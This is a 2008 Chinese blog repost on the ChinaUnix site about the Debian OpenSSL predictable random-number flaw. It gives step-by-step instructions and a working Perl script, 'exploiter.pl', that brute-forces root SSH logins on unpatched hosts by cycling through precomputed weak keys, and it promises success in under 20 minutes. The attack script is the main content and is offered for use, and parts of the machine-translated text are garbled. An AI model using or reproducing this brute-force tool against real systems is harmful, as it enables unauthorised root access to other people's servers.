Debian OpenSSL可预测的PRNG暴力破解SSH分析-sdccf-ChinaUnix博客

Fosdccf.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

sdccf

博客访问： 101961104
博文数量： 19283
博客积分： 9968
博客等级：上将
技术积分： 196062
用户组：普通用户
注册时间： 2007-02-07 14:28

文章分类

全部博文（19283）

香文化（0）
CU技术专题（2443）

Linux酷软（214）

tmp（0）

PostgreSQL（93）

Solaris（383）

AIX（173）

SCOUNIX（575）

DB2（1005）
涂鸦（9）
编程开发（1573）

Shell（386）

C/C++（1187）
数据库（6458）

MySQL（1750）

Sybase（465）

Oracle（3695）

Informix（548）
操作系统（8627）

HP-UX（0）

IBM AIX（2）

Sun Solaris（0）

BSD（1）

Linux（8597）

SCO UNIX（23）
未分配的博文（173）

文章存档

2011年（1）

2009年（125）

2008年（19094）

2007年（63）

我的朋友

相关博文

Debian OpenSSL可预测的PRNG暴力破解SSH分析

分类： LINUX

2008-05-16 16:51:05

作者: uprtystpk 出自:

解开Debian OpenSSL内的ssh钥匙只有65.536可能性，导致唯一的熵是引起钥匙的过程的Pid.

这导致以下perl脚本程序可以使用与暴力的预先计算好的ssh钥匙。如果钥匙在一个非被修补的debian或其他系统指南被安装配置，它就会运作。

在一个未修补的系统中，不需要Debian，做以下工作:

keys provided by HD Moore -

1. Download

2. 提取它对应目录

3. 输入/root/.ssh/authorized_keys与2048位的SSH RSA钥匙，引起在Upatched Debian (这是这盘剥将增殖比的钥匙 eak)

4. 运行perl脚本程序并且给它提取bzip2的位置.

CODE:

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By hack01[at]live[dot]cn\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}

5. 在几分钟(少于20分钟)以后享受胜利结果吧!

阅读(458) | 评论(0) | 转发(0) |

上一篇：Verizon加入Limo基金09年推Linux手机

下一篇：Linux需要显示多核模式

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6